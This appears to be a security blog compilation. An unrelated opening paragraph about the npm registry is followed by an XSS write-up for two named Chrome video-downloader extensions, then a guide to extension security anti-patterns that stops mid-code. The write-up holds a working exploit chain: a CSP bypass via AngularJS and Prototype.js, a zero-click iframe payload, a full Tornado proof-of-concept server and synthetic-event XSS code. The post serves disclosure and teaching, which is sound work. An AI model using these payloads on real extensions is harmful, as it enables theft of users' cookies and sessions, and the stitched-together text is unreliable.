NOTE: If you’re just looking for the high level points, see the “The TL;DR Summary & High-Level Points” section of this post.

Recently I took an interest in the npm registry due to it’s critical role in the security of managing packages for all of JavaScript and Node. After registering an account and creating an example package, I began looking through various web endpoints to understand what sort of system I was dealing with.

Note: This post is going to be a bit different from the previous Chrome extension vulnerability writeups. I’m going to actually walk through the code along with you to show you how tracing through an extension generally works. For this reason the whole thing is a bit lengthy.

While scanning various Chrome extensions with tarnish I found the popular Chrome extensions Video Downloader for Chrome version 5.0.0.12 (8.2 million users) and Video Downloader Plus (7.3 million users) suffers from a Cross-site Scripting (XSS) vulnerability in their browser action page. All that is required to exploit these extensions is for a victim to navigate to an attacker-controlled page.

The cause of this vulnerability is due to the use of string concatenation to build HTML which is dynamically appended to the DOM via jQuery. An attacker can craft a specialized link which will cause arbitrary JavaScript execution in the context of the extension. Using this exploit, an attacker can abuse the following permissions which the extension has access to:

"permissions": [
    "alarms",
    "contextMenus",
    "privacy",
    "storage",
    "cookies",
    "tabs",
    "unlimitedStorage",
    "webNavigation",
    "webRequest",
    "webRequestBlocking",
    "http://*/*",
    "https://*/*",
    "notifications"
],

Using the above permissions an attacker is able to dump all browser cookies, intercept all browser requests and communicate as the authenticated user to all sites. It’s about as powerful of an extension as it gets.

The Vulnerability

The core of this vulnerability is the following piece of code:

vd.createDownloadSection = function(videoData) {
    return '<li class="video"> \
        <a class="play-button" href="' + videoData.url + '" target="_blank"></a> \
        <div class="title" title="' + videoData.fileName + '">' + videoData.fileName + '</div> \
        <a class="download-button" href="' + videoData.url + '" data-file-name="' + videoData.fileName + videoData.extension + '">Download - ' + Math.floor(videoData.size * 100 / 1024 / 1024) / 100 + ' MB</a>\
        <div class="sep"></div>\
        </li>';
};

This is a fairly textbook example of code vulnerable to Cross-site Scripting (XSS). The extension pulls these video links from our attacker-controlled page, so exploiting it should be straightforward. However, as is often the case with textbook examples, the real world situation is much more complicated. This post will walk through the speed bumps encountered along the way and demonstrate how they were bypassed. We’ll start with where our input is taken in, and follow it all the way to the final function.

The Path to Victory

The extension makes use of a Content Script to collect possible video URLs from both page links (<a> tags), and videos (<video> tags). Content Scripts are JavaScript snippets which run on pages the user has visited in their browser (in this case, every page the user visits). The following code is taken from the extension’s Content Script:

vd.getVideoLinks = function(node) {
    // console.log(node);
    var videoLinks = [];
    $(node)
        .find('a')
        .each(function() {
            var link = $(this).attr('href');
            var videoType = vd.getVideoType(link);
            if (videoType) {
                videoLinks.push({
                    url: link,
                    fileName: vd.getLinkTitleFromNode($(this)),
                    extension: '.' + videoType
                });
            }
        });
    $(node)
        .find('video')
        .each(function() {
            // console.log(this);
            var nodes = [];
            // console.log($(this).attr('src'));
            $(this).attr('src') ? nodes.push($(this)) : void 0;
            // console.log(nodes);
            $(this)
                .find('source')
                .each(function() {
                    nodes.push($(this));
                });
            nodes.forEach(function(node) {
                var link = node.attr('src');
                if (!link) {
                    return;
                }
                var videoType = vd.getVideoType(link);
                videoLinks.push({
                    url: link,
                    fileName: vd.getLinkTitleFromNode(node),
                    extension: '.' + videoType
                });
            });
        });
    return videoLinks;
};

As can be seen in the above code, the links and video elements are iterated over and the information is collected into the videoLinks array before being returned. The videoLinks element properties that we have control over are url (pulled from the href attribute), and fileName (pulled by getting the title attribute, alt attribute, or the node’s inner text).

This is called by the function vd.findVideoLinks:

vd.findVideoLinks = function(node) {
    var videoLinks = [];
    switch (window.location.host) {
        case 'vimeo.com':
            vd.sendVimeoVideoLinks();
            break;
        case 'www.youtube.com':
            break;
        default:
            videoLinks = vd.getVideoLinks(node);
    }
    vd.sendVideoLinks(videoLinks);
};

This call occurs at the beginning of the page load for every page:

vd.init = function() {
    vd.findVideoLinks(document.body);
};

vd.init();

Upon harvesting all of these links they are sent to the extension’s background page via the function vd.sendVideoLinks. The following is the message listener declared in the extension’s background page:

chrome.runtime.onMessage.addListener(function(request, sender, sendResponse) {
    switch (request.message) {
        case 'add-video-links':
            if (typeof sender.tab === 'undefined') {
                break;
            }
            vd.addVideoLinks(request.videoLinks, sender.tab.id, sender.tab.url);
            break;
        case 'get-video-links':
            sendResponse(vd.getVideoLinksForTab(request.tabId));
            break;
        case 'download-video-link':
            vd.downloadVideoLink(request.url, request.fileName);
            break;
        case 'show-youtube-warning':
            vd.showYoutubeWarning();
            break;
        default:
            break;
    }
});

Our case is the add-video-links option, our send.tab is not undefined so it calls vd.addVideoLinks with the video link data scraped earlier. The following is the code for addVideoLinks:

vd.addVideoLinks = function(videoLinks, tabId, tabUrl) {
	...trimmed for brevity...
    videoLinks.forEach(function(videoLink) {
        // console.log(videoLink);
        videoLink.fileName = vd.getFileName(videoLink.fileName);
        vd.addVideoLinkToTab(videoLink, tabId, tabUrl);
    });
};

The above code checks to see if it has already stored the link data for this tabId previously. If not it creates a new object for doing so. The fileName attribute of each piece of link data is run through the vd.getFileName function, which has the following code:

vd.getFileName = function(str) {
    // console.log(str);
    var regex = /[A-Za-z0-9()_ -]/;
    var escapedStr = '';
    str = Array.from(str);
    str.forEach(function(char) {
        if (regex.test(char)) {
            escapedStr += char;
        }
    });
    return escapedStr;
};

The above function crushes our chances for obtaining DOM-XSS via the fileName attribute of the link data. It will strip out any characters which do not match the regex [A-Za-z0-9()_ -], sadly including characters like " which could be used to break out of the attribute in the concatenated HTML.

This leaves us with just the url property, so let’s continue on.

The videoLink is sent to the vd.addVideoLinkToTab function, which is the following:

vd.addVideoLinkToTab = function(videoLink, tabId, tabUrl) {
	...trimmed for brevity...
    if (!videoLink.size) {
        console.log('Getting size from server for ' + videoLink.url);
        vd.getVideoDataFromServer(videoLink.url, function(videoData) {
            videoLink.size = videoData.size;
            vd.addVideoLinkToTabFinalStep(tabId, videoLink);
        });
    } else {
        vd.addVideoLinkToTabFinalStep(tabId, videoLink);
    }
};

The script checks to see if the link data has a size property (which it won’t). In the cases where size is not set it gets the size of the file at the link location via vd.getVideoDataFromServer:

vd.getVideoDataFromServer = function(url, callback) {
    var request = new XMLHttpRequest();
    request.onreadystatechange = function() {
        if (request.readyState === 2) {
            callback({
                mime: this.getResponseHeader('Content-Type'),
                size: this.getResponseHeader('Content-Length')
            });
            request.abort();
        }
    };
    request.open('Get', url);
    request.send();
};

The above code simply fires an XMLHTTPRequest request to grab the headers for the file at the specified link and pulls the Content-Type and Content-Length headers. This data is returned and the value of the Content-Length header is used to set the size property of the videoLinks element. After this is done the result is passed to vd.addVideoLinkToTabFinalStep:

vd.addVideoLinkToTabFinalStep = function(tabId, videoLink) {
    // console.log("Trying to add url "+ videoLink.url);
    if (!vd.isVideoLinkAlreadyAdded(
            vd.tabsData[tabId].videoLinks,
            videoLink.url
        ) &&
        videoLink.size > 1024 &&
        vd.isVideoUrl(videoLink.url)
    ) {
        vd.tabsData[tabId].videoLinks.push(videoLink);
        vd.updateExtensionIcon(tabId);
    }
};

Here we start to encounter a number of snags. We want the URL to be appended to the vd.tabsData[tabId].videoLinks array but this will only happen if we pass the following conditional:

!vd.isVideoLinkAlreadyAdded(
    vd.tabsData[tabId].videoLinks,
    videoLink.url
) &&
videoLink.size > 1024 &&
vd.isVideoUrl(videoLink.url)

The vd.isVideoLinkAlreadyAdded is a simple check to see if the URL has already been recorded in the vd.tabsData[tabId].videoLinks array. The second check is that the videoLink.size is larger than 1024. Recall that this value is taken from the retrieved Content-Length header. In order to pass this check we create a basic Python Tornado server and create a wildcard route and return a large enough response:

...trimmed for brevity...
def make_app():
    return tornado.web.Application([
        ...trimmed for brevity...
        (r"/.*", WildcardHandler),
    ])

...trimmed for brevity...
class WildcardHandler(tornado.web.RequestHandler):
    def get(self):
        self.set_header("Content-Type", "video/x-flv")
        self.write( ("A" * 2048 ) )
...trimmed for brevity...

Now that we’ve wildcarded that route, no matter what our crafted link is it will always route to a page which will return > 1024 bytes. This solves this check for us.

The next check requires that the vd.isVideoUrl function returns true, the code for that function is the following:

vd.videoFormats = {
    mp4: {
        type: 'mp4'
    },
    flv: {
        type: 'flv'
    },
    mov: {
        type: 'mov'
    },
    webm: {
        type: 'webm'
    }
};

vd.isVideoUrl = function(url) {
    var isVideoUrl = false;
    Object.keys(vd.videoFormats).some(function(format) {
        if (url.indexOf(format) != -1) {
            isVideoUrl = true;
            return true;
        }
    });
    return isVideoUrl;
};

This check is fairly straightforward. It simply checks to ensure that either mp4, flv, mov or webm is contained in the URL. We can easily get around this check by just appending a .flv to the end of our url payload.

Since we’ve successfully met all the requirements for the conditional, our url is appended to the vd.tabsData[tabId].videoLinks array.

Moving over to the original popup.js script which contained the core vulnerable function shown above, we see the following:

$(document).ready(function() {
    var videoList = $("#video-list");
    chrome.tabs.query({
        active: true,
        currentWindow: true
    }, function(tabs) {
        console.log(tabs);
        vd.sendMessage({
            message: 'get-video-links',
            tabId: tabs[0].id
        }, function(tabsData) {
            console.log(tabsData);
            if (tabsData.url.indexOf('youtube.com') != -1) {
                vd.sendMessage({
                    message: 'show-youtube-warning'
                });
                return
            }
            var videoLinks = tabsData.videoLinks;
            console.log(videoLinks);
            if (videoLinks.length == 0) {
                $("#no-video-found").css('display', 'block');
                videoList.css('display', 'none');
                return
            }
            $("#no-video-found").css('display', 'none');
            videoList.css('display', 'block');
            videoLinks.forEach(function(videoLink) {
                videoList.append(vd.createDownloadSection(videoLink));
            })
        });
    });
    $('body').on('click', '.download-button', function(e) {
        e.preventDefault();
        vd.sendMessage({
            message: 'download-video-link',
            url: $(this).attr('href'),
            fileName: $(this).attr('data-file-name')
        });
    });
});

The above code fires when the extension’s browser icon is clicked on. The extension queries the Chrome extension API for the current tab’s metadata. The ID of this tab is taken from the metadata and the get-video-links call is sent to the background page. The code for this is just sendResponse(vd.getVideoLinksForTab(request.tabId)); which returns the video link data we discussed above.

The video links are iterated over and each one is passed to the vd.createDownloadSection function shown at the beginning of this post. This does HTML concatenation to build a large string which is appended to the DOM using jQuery’s .append() function. Passing raw HTML with user input to append() is a classic example of Cross-site Scripting (XSS).

It seems we can get our payload to the vulnerable function relatively unscathed! However it’s too early to celebrate. We have another speed-bump to overcome: Content Security Policy (CSP).

Content Security Policy

Interestingly enough, the Content Security Policy for this extension does not have unsafe-eval in its script-src directive. The following is an excerpt from the extension:

script-src 'self' https://www.google-analytics.com https://ssl.google-analytics.com https://apis.google.com https://ajax.googleapis.com; style-src 'self' 'unsafe-inline' 'unsafe-eval'; connect-src *; object-src 'self'

From the above Content Security Policy (CSP) we can see the script-src is the following:

script-src 'self' https://www.google-analytics.com https://ssl.google-analytics.com https://apis.google.com https://ajax.googleapis.com

This policy prevents us from sourcing any arbitrary websites, and forbids us from doing inline JavaScript declaration (e.g. <script>alert('XSS')</script>. The only way we can execute JavaScript is by sourcing from one of the following sites:

  • https://www.google-analytics.com
  • https://ssl.google-analytics.com
  • https://apis.google.com
  • https://ajax.googleapis.com

When you’re looking to bypass a CSP policy, seeing both https://apis.google.com and https://ajax.googleapis.com in the script-src directive is very good. These sites have many JavaScript libraries hosted on them, as well as JSONP endpoints - both useful in bypassing Content Security Policy.

Note: If you’re ever looking to check if a site is a bad source to add to a CSP, check out the CSP Evaluator Tool made by some pretty smart Googlers (shoutout to @we1x specifically).

For some previous art in this space the H5SC Minichallenge 3: "Sh*t, it's CSP!" was a contest where contestants had to achieve XSS on a page which only whitelisted ajax.googeapis.com. This challenge is remarkably similar to the situation we face now.

One of the more clever solutions in that contest was the following payload:

"ng-app ng-csp><base href=//ajax.googleapis.com/ajax/libs/><script src=angularjs/1.0.1/angular.js></script><script src=prototype/1.7.2.0/prototype.js></script>\{\{$on.curry.call().alert(1337

To quote the contest runner on the solution:

This submission is very interesting as it abuses an effect from combining Prototype.js with AngularJS. > AngularJS quite successfully prohibits access to window using its integrated sandbox. Yet, Prototype.JS extends functions with the curry property, that upon being called with call() returns a window object - without AngularJS noticing. This means, we can use Prototype.JS to get hands on window > and execute almost arbitrary methods of that object.

The white-listed Google-CDN provides both outdated AngularJS versions as well as Prototype.JS - giving us access to what we need to operate on window as we like it. It requires no user interaction to work.

By modifying this payload we can exploit this extension as well. The following is a payload which uses this same technique to execute alert('XSS in Video Downloader for Chrome by mandatory'):

"ng-app ng-csp><script src=https://ajax.googleapis.com/ajax/libs/angularjs/1.0.1/angular.js></script><script src=https://ajax.googleapis.com/ajax/libs/prototype/1.7.2.0/prototype.js></script>\{\{$on.curry.call().alert('XSS in Video Downloader for Chrome by mandatory')\}\}<!--

The following image demonstrates our payload firing upon clicking the extension’s icon:

We now have arbitrary JavaScript execution in the context of the extension and can abuse any Chrome extension API the extension has access to. However, it does require a user to click the extension icon while being on our malicious page. It’s best not to convey weakness when building exploits so we’ll try to make this require no user-interaction.

Going back to the manifest.json, we can see that the web_accessible_resources directive has been set to the following:

"web_accessible_resources": [
    "*"
]

This use of just a wildcard means that any webpage can <iframe> and source any resource contained in the extension. In our case, the resource we want to include is the popup.html page which normally is only shown when the user clicks the extension’s icon. By iframing this page along with our previous payload we have a no-user-interaction-required exploit:

The final payload being the following:

<!DOCTYPE html>
<html>
<body>
    <a href="https://&#x22;ng-app ng-csp&#x3E;&#x3C;script src=https://ajax.googleapis.com/ajax/libs/angularjs/1.0.1/angular.js&#x3E;&#x3C;/script&#x3E;&#x3C;script src=https://ajax.googleapis.com/ajax/libs/prototype/1.7.2.0/prototype.js&#x3E;&#x3C;/script&#x3E;\{\{$on.curry.call().alert(&#x27;XSS in Video Downloader for Chrome by mandatory&#x27;)\}\}&#x3C;!--.flv">test</a>

    <iframe src="about:blank" id="poc"></iframe>

    <script>
    setTimeout(function() {
        document.getElementById( "poc" ).setAttribute( "src", "chrome-extension://dcfofgiombegngbaofkeebiipcdgpnga/html/popup.html" );
    }, 1000);
    </script>
</body>
</html>

This works in two parts, the first part sets the videoLinks array for the current tab. The second part fires after one seconds and makes the location of the iframe chrome-extension://dcfofgiombegngbaofkeebiipcdgpnga/html/popup.html (the popup page). The final proof of concept (Python webserver and all) is the following:

import tornado.ioloop
import tornado.web

class MainHandler(tornado.web.RequestHandler):
    def get(self):
        self.write("""
<!DOCTYPE html>
<html>
<body>
    <a href="https://&#x22;ng-app ng-csp&#x3E;&#x3C;script src=https://ajax.googleapis.com/ajax/libs/angularjs/1.0.1/angular.js&#x3E;&#x3C;/script&#x3E;&#x3C;script src=https://ajax.googleapis.com/ajax/libs/prototype/1.7.2.0/prototype.js&#x3E;&#x3C;/script&#x3E;\{\{$on.curry.call().alert(&#x27;XSS in Video Downloader for Chrome by mandatory&#x27;)\}\}&#x3C;!--.flv">test</a>

    <iframe src="about:blank" id="poc"></iframe>

    <script>
    setTimeout(function() {
        document.getElementById( "poc" ).setAttribute( "src", "chrome-extension://dcfofgiombegngbaofkeebiipcdgpnga/html/popup.html" );
    }, 1000);
    </script>
</body>
</html>
        """)

class WildcardHandler(tornado.web.RequestHandler):
    def get(self):
        self.set_header("Content-Type", "video/x-flv")
        self.write( ("A" * 2048 ) )

def make_app():
    return tornado.web.Application([
        (r"/", MainHandler),
        (r"/.*", WildcardHandler),
    ])

if __name__ == "__main__":
    app = make_app()
    app.listen(8888)
    tornado.ioloop.IOLoop.current().start()

Disclosure & Remediation

Since there was no obvious way to contact either extension owner (minimal contact details on their respective Chrome extension pages). I reached out to some folks who work on Chrome Extension security at Google. They appropriately notified the extension owners and worked to get a fix in place. The latest version of both extension should no longer be vulnerable to the vulnerabilities described here. This post has also waited out the time for everyone with the extension to automatically update, so everyone should be patched!

That’s All Folks

If you have any questions or comments feel free to reach out to me on Twitter. If you’d like to find some Chrome extension vulnerabilities yourself try out the scanner I built tarnish which should help you get started (source code here). If you’re looking for a good intro to Chrome extension security, check out “Kicking the Rims – A Guide for Securely Writing and Auditing Chrome Extensions”.

-mandatory

A Thin Layer of Chrome Extension Security Prior-Art

Chrome extension security and methodologies for auditing Chrome extensions for vulnerabilities appears to be a topic with shockingly little prior art. Especially when compared to other platforms such as Electron, which have had extension research on the topic. Searching the internet for guides and tools for auditing Chrome extensions yields very little, an academic paper written to describe Chrome’s extension security model and a 2013 blog post on an example of XSS in an intentionally-vulnerable extension. Other results appear to be out-of-date, such as this Chrome extension fingerprinting guide, which no longer works for new Chrome extensions.

Of course, it’s not as if security issues in Chrome extensions haven’t been found or are particularly rare. One big example was the case of a Cross-site Scripting (XSS) vulnerability in the Reddit Enhancement Suite (RES) extension that allowed for wormable exploitation. For a good summary of that vulnerability, see this write up on it; the extension had 1.5 million users at the time.

This example is not even a worst case scenario, due to the fact this XSS was in a Content Script of the extension and not in a Background Page (this guide will dive into the differences). In short: vulnerabilities in the Background Pages, the pages with access to all of the privileged extension APIs, are much worse than any regular XSS. It results in the ability to abuse any of the declared APIs of the extension, such as the ability to access all sites as the victim, modify/edit browser bookmarks, history, and more. For example, the Steam Inventory Helper extension suffered from a vulnerability that resulted in arbitrary JavaScript execution in the Background Page context, resulting in the ability to hijack all of the accounts of the victim, on every website they were authenticated to.

Given the incredible popularity of the Chrome browser and its extensions, it seems that this platform is definitely deserving of a closer look into the security pitfalls that can occur. This guide attempts to outline extension security anti-patterns, as well as provide a usable service (tarnish) to aide developers and security researchers in auditing Chrome extensions.

Before diving into security anti-patterns in Chrome extensions it’s important to get an understanding of how exactly these extensions are structured. To be upfront and explicit: the developers behind Chrome have put a lot of thought into extension security and insecure anti-patterns. Their architecture makes this very clear as I’ll discuss below, and a lot of it is all designed with the core idea of making an environment where developers cannot easily shoot themselves in the foot. In an age where we have platforms such as Electron and NW.js, which seem intent on taking the systemic issue of Cross-site Scripting (XSS) to the desktop and turning it all into Remote Code Execution (RCE) without any safeguards; Chrome’s extension environment is a solid foundation on an otherwise shaky landscape. Chrome extensions don’t even have the ability to execute arbitrary system commands, but they still take extreme care to ensure that a developer has a hard time doing the wrong thing anyways.

Isolated But Talkative Worlds

A Quick Disclaimer

This section get fairly into the weeds of how Chrome extensions operate. If you’re already familiar with this, then you can skip straight to the “Stealing from the Stainless, Security Anti-Patterns in the Extension World” section. Even if you already develop Chrome extensions reading this section is still likely useful as a refresher.

Home is Where the manifest.json Is – The Basic Extension Layout

The file structure of a Chrome extension is actually very simple. A Chrome extension is essentially just a zip folder with a file extension of .crx. The core of the extension is a manifest.json file in the root of the folder which specifies the layout, permissions, and other configuration options. To be blunt, understanding the manifest.json format is critical for auditing extensions for security vulnerabilities. All paths of the extension are relative to the base location where the manifest.json is located. So if you have an image in the root named example.jpg, it would be located at chrome-extension://[EXTENSION_ID]/example.jpg (the extension ID is a base32-encoded SHA256 hash of the Chrome extension private key).

The Extension Architecture, Namespace Isolation and the DOM

The design of how Chrome extensions work makes a large difference in how they can be exploited. Much of this is actually outlined in the academic paper I linked to earlier, but I’ll dive into it here as well since the paper is a bit dated.

The Chrome extension layout can be best shown when it’s visualized:

webpage-dom-chrome-seperation

The above diagram shows the different parts of a Chrome extension. Each colored box is a separate JavaScript variable namespace. Separate variable namespaces mean that if you declared a variable in JavaScript like the following:

var test = 2;

This variable would be accessible only from its own context (the different colored boxes cannot accessible the variables of each other directly). If this was a variable in the Background Page for example, it would not be accessible from the Content Script or web page. The same goes for the variables declared by the Content Script, they cannot be accessed by either the Background Page, or the web page itself. This sandboxing prevents a rogue web page from interfering with the running Content Script(s) or the extension’s Background Page, since it cannot access or change any of their variables or functions.

The Same Origin Policy (SOP) in the Chrome Extension World

This separation makes a lot of sense when you also understand how the Same Origin Policy applies for Chrome extensions. Each Chrome extension has its own origin which is the following format:

chrome-extension://[32_CHAR_EXTENSION_ID]

This means that any resource that falls under this origin can be accessed by the Chrome extension API. This origin structure makes sense because all of a Chrome extension’s resources will be inside of the chrome-extension://[32_CHAR_EXTENSION_ID]/ directory. This applies when we’re talking about Background Pages and Browser Action pages, all of these execute within the chrome-extension://[32_CHAR_EXTENSION_ID] origin. Take the following example:

chrome-extension://[32_CHAR_EXTENSION_ID]/index.html
chrome-extension://[32_CHAR_EXTENSION_ID]/example.html

Both of these pages could access both the DOM and the JavaScript namespaces of each other because they have the same origin. Note that this means in the case of an access via an iframe contentWindow or window.opener. The variable namespace of each Background Page is not shared with each other in any global sort of way (except for in the case of multiple Background Page Scripts – which just end up getting globbed into a single Background Page at runtime). You can view and debug a Background Page by enabling Developer Mode in Chrome.

Content Scripts work a little differently, they operate in the origin of the web page they are scoped for. So if you have a Content Script running on https://example.com its effective origin is https://example.com. This means it can do things like interact with https://example.com’s DOM, add event listeners, and perform XMLHTTPRequests to retrieve web pages for this origin. However, it cannot modify the DOM of the corresponding extension’s Background Page, because those are different origins. That being said, the Content Script does have slightly more privileges with the ability to message the Background Page, and call some limited Chrome extension APIs. This is a bit of a strange setup because it feels much like your Content Script and your web page are running in separate “pages” due to the namespace isolation, even though they still share a DOM. To view a Content Script in Chrome and debug it, you can pop open the Chrome Developer Tools menu via Options > More Tools > Developer Tools. Once the developer tools are shown, click on the “Sources” tab and click the sub-tab “Content Scripts”. Here you can see the running Content Scripts for your various extensions, and can set breakpoints to monitor the execution flow:

developer-console

Much of my time auditing a Chrome extension is spent in the Chrome developer panel seen above, setting breakpoints and following the execution.

Crossing the Barriers with Injection and Message Passing

However, despite the separation of namespaces there is still plenty of room for the Chrome extension to do its work. For example, say the Content Script needs to retrieve the value of a variable defined in the web page’s namespace. While it cannot access the web page’s namespace directly it can access the web page’s DOM and inject a new script tag (<script>) into it. This injected script tag would then be executing in the web page’s namespace and would have access to its variables. Upon retrieving the variable, the injected script can then pass the value back to the Content Script via postMessage(). This is what is shown by having the Content Script and the web page inside of the parent “Web page DOM” box, both have access to the web page’s DOM but do not have access to eachothers namespace. The following illustration demonstrates the flow of grabbing a variable from the web page and passing it back to the Content Script:

message-passing-example

One of the the most important things to understand in the Chrome extension auditing process is how these isolated worlds work together. The answer is (mainly) via message passing. In Chrome extensions there are a few different ways to pass messages around, such as chrome.runtime.sendMessage() for messaging the Background Pages from Content Script(s), or window.addEventListener() for passing messages from web pages to Content Script(s). From a security perspective, whenever a message is passed from a lower privileged context to a higher privileged context (for example a message from a Content Script to the Background page) there exists a possible avenue for exploitation via unexpected input. It’s also important to ensure that messaging is scoped properly as to not send out sensitive data to unintended origins. In the case of postMessage(), this means not using a wildcard “*” to send messages, since any webpages with a reference to the window could potentially listen in for them.

Web Accessible Resources & Navigation Blocking

As if the namespace isolation was not enough, there is another layer of protection around Chrome extension resources. Files in a Chrome extension, by default, are not able to be iframed, sourced, or otherwise included into regular web pages on the Internet. So https://example.com could not iframe chrome-extension://pflahkdjlekaeehbenhpkpipgkbbdbbo/test.html for example. However, Chrome’s extension API does allow you to loosen this restriction by declaring these resources via the web_accessible_resources directive in the extension’s manifest. This is useful in cases where you want to allow a regular web page to include JavaScript, images, or other resources from your extension. The downside to this from a security perspective is that any HTML pages that are set with this flag can now be attacked via clickjacking, passing malicious input into location.hash, unexpected messaging via postMessage(), or by iframing and running background pages in an unexpected order. For this reason it is generally dangerous for developers to wildcard a large number of their resources with this directive. Additionally, if a Chrome extension exposes any resources via this directive, an arbitrary web page on the Internet can use these sourceable resources to fingerprint that a user is running a particular extension. This has plenty of uses both in exploitation and in general web tracking.

Background Pages and Content Security Policy

The background page is the most privileged of the various worlds as it has the ability call all of the Chrome extension APIs declared in the extension’s manifest. These APIs are the core of what makes extensions powerful, with the ability to do things like manage cookies, bookmarks, history, downloads, proxy settings, etc. Given the powerful nature of these pages, Chrome requires that developers have a Content Security Policy (CSP) declared with certain minimal requirements. The Chrome extension documentation states the policy is the following by default:

script-src 'self'; object-src 'self'

That’s effectively true, though to be pedantic it’s worth mentioning the default policy is actually the following (you can verify this yourself using the Network panel of Chrome’s developer tools):

script-src 'self' blob: filesystem: chrome-extension-resource:; object-src 'self' blob: filesystem:;

The above policy is slightly more lax to allow for some general JavaScript operations, such as creating blob: URIs and interacting with the filesystem. Of course, often developers see this default policy and are annoyed by just how strict it is. This annoyance often results with developers attempting to loosen the CSP as much as possible in order to just “have it work”. The Chrome team foresaw this danger and added in additional requirements to prevent developers from making their CSP too loose. For this reason there is no way to allow for the ‘unsafe-inline’ source in a Chrome extension CSP (hold for <script>s with nonces). This means that a developer can never make use of inline JavaScript execution similar to the following:

Name: <input onfocus=”example()” name=”test” />
…
<a href=”javascript:example()”>Click to start</a>
…
<script>alert(“Welcome!”)</script>

While this can be painful to many developers who are used to this style of web development, its security advantages cannot be understated. In doing this, Chrome has made it much harder for developers to write Cross-site Scripting (XSS) vulnerabilities in their Background Pages. From my experience of auditing quite a few Chrome extensions this has been the only mitigating factor in an otherwise completely exploitable vulnerability. Additionally, it’s worth mentioning that this requirement often forces developers to write their extensions in a more clean way, since they have to separate their views and their core logic.

However, you can still make many of the other common mistakes you see with CSP. Developers can (and often do) add ‘unsafe-eval’ to their CSP and often wildcard CDNs, and other sources which anyone can upload and source scripts from. These things often allow for attackers to bypass all of the protections of the CSP.

Stealing from the Stainless, Security Anti-Patterns in the Extension World

Content Scripts Obey No Man…or CSP

With all of the talk around Content Security Policy (CSP) requirements for Background Pages one might get the idea that Cross-site Scripting (XSS) is dead in Chrome extensions. This is not at all the case, it has just been weighted over to the Content Script side of the extension. Content Scripts do not have to obey the CSP declared for the extension, they also don’t have to obey the CSP of the web page they’re executing under (unless they inject a <script> into the web page’s DOM). So if https://example.com has a CSP of the following:

script-src 'self'; object-src 'self'

This is completely irrelevant to the JavaScript executing in the Content Script context. It can, for example, make use of eval() all it wants, despite this being forbidden by the web page it runs in the origin of. This very often translates into developers creating Chrome extensions with Content Scripts that actually introduce new vulnerabilities into popular websites, which would otherwise be safe. The RES XSS vulnerability that was mentioned earlier is a great example of this occurring. Despite Reddit not having a Cross-site Scripting (XSS) vulnerability, RES introduced one into the site for those with the extension installed. It did this by taking a user-controllable image title and injecting it back as HTML unsafely into Reddit’s web page DOM. The result was Reddit was vulnerable to a zero-click XSS for all users of the RES extension.

When studying this reality, an anti-pattern begins to emerge. Developers writing Content Scripts have a strong chance of shooting themselves (and their users) in the foot if they perform unsafe DOM operations using user-controlled input. Extension developers should take extreme care to ensure they are not performing unsafe DOM operations using calls such as innerHTML, html(), or setting href (javascript: URIs) to name a few examples.

The Web Page DOM Cannot Be Trusted

Another common anti-pattern that Chrome extension developers will fall into is that they will trust content provided from an external web page. This manifests in multiple forms such as trusting data in the DOM, events fired from event listeners, or messages sent from the web page to a Content Script.

In the case of the DOM, an attacker can modify the layout to any format they’d like in order to exploit the Content Script’s use of it. It should also be noted that any case where sensitive data is put into the DOM is accessible by attackers via a malicious web page, or via an XSS vulnerability in a trusted web page. For example, the Grammarly Chrome extension made this mistake when they put sensitive authentication tokens in the DOM of all web pages, allowing for a malicious web page to simply extract it from the DOM and use it to authenticate to their API. This is perhaps more common when an extension is putting some sort of UI into a web page for a user to view. Often times in these UI elements developers will put sensitive information which should not be let outside of the Chrome extension at all. Even worse, often these elements are later queried again by the Content Script and use to perform trusted operations. These patterns allow for an attacker to swoop in the middle of these actions and modify the DOM elements to contain unexpected input.

JavaScript DOM Events Must Be Verified

Event listeners, one of the primary channels between Content Scripts and the web page DOM are also subject to exploitation by attackers. These are especially deceptive because developers expect events to be generated purely from user actions and not synthetically created by an attacker. Take a script such as the following:

// Create an element to inject
var injected_last_key_element = document.createElement( "div" );
injected_last_key_element.innerHTML = 'Last character typed: <div id="last_keypress_div"></div>';
// Inject this box into the page
document.body.appendChild(
    injected_last_key_element
);

// Listen for keydown event and show it's value in the previously-injected div
document.body.addEventListener( "keydown", function( keyevent ) {
    document.getElementById( "last_keypress_div" ).innerHTML = keyevent.code;
});

The above code will listen for keydown events and will display the last key code value inside of a <div> injected into the document’s body. So if you pressed the “a” key on your keyboard, the string “KeyA” would appear inside of this injected <div>. The following is a screenshot from MDN documentation on KeyboardEvent:

keyboard-event-codeThe page on KeyboardEvent.code itself states the following:

The KeyboardEvent.code property represents a physical key on the keyboard (as opposed to the character generated by pressing the key). In other words, this property returns a value which isn’t altered by keyboard layout or the state of the modifier keys.

Reading this documentation, as a developer you might think that XSS is not possible here. After all, this will only display the last key code pressed by the user’s keyboard, and the documentation says the property is “Read Only”! How could that be used to cause XSS? Even if you could send synthetic events, it would just be the predefined key codes, and the <div> would be rewritten on each event, right?

However, you’d be completely wrong, this is actually easily exploitable. The following code demonstrates code which would result in an XSS:

// Generate a synthetic key event
function generate_fake_key_event(target_element, key_event_type, custom_properties) {
  var new_event = document.createEvent(
    "KeyboardEvent",
  );
  for (var property_keyname in custom_properties)
    if (custom_properties.hasOwnProperty(property_keyname)) {
      // Chromium Hack
      Object.defineProperty(new_event, property_keyname, {
        get: function() {
          return custom_properties[property_keyname];
        }
      });
      new_event.initKeyboardEvent(
        key_event_type,
        true,
        true,
        document.defaultView,
        false,
        false,
        false,
        false,
        0,
        0
      );
      new_event[property_keyname] = custom_properties[property_keyname];
    }
  }
  target_element.dispatchEvent(
    new_event
  );
}
// Send a keydown with a code of <img src=x onerror=alert('XSS') />
generate_fake_key_event(
  document.body,
  "keydown",
  {
    "code": "<img src=x onerror=alert('XSS') />",
  }
)

The above code results in the XSS firing, and an alert with the text “XSS” to be displayed:

xss-alert
The above example demonstrates a few important pitfalls of trusting arbitrary events:

  • Events can be generated without any user interaction.
  • Even if an event states something similar to “Read Only” in the documentation, this is purely to state that an authentically-created event can’t have this property modified after being generated. This doesn’t apply at all to synthetically-generated events.
  • Synthetically-generated events don’t even have to follow the expected format for event property values. Even though the documentation says the “codes” are in a predefined format, this is not enforced in the case of synthetically-generated events. So an attacker can specify <img src=x onerror=alert(‘XSS’) /> instead of something like KeyA.

This all sounds very painful, but luckily there is a simple check that can be done to verify that an event is actually user-generated. User generated events have their isTrusted property set to true, whereas script-generated events have the isTrusted property set to false. Using this check we can verify if an event was actually created by a user or is simply synthetic:

// Listen for keydown event and show its value in the previously-injected div
document.body.addEventListener( "keydown", function( keyevent ) {
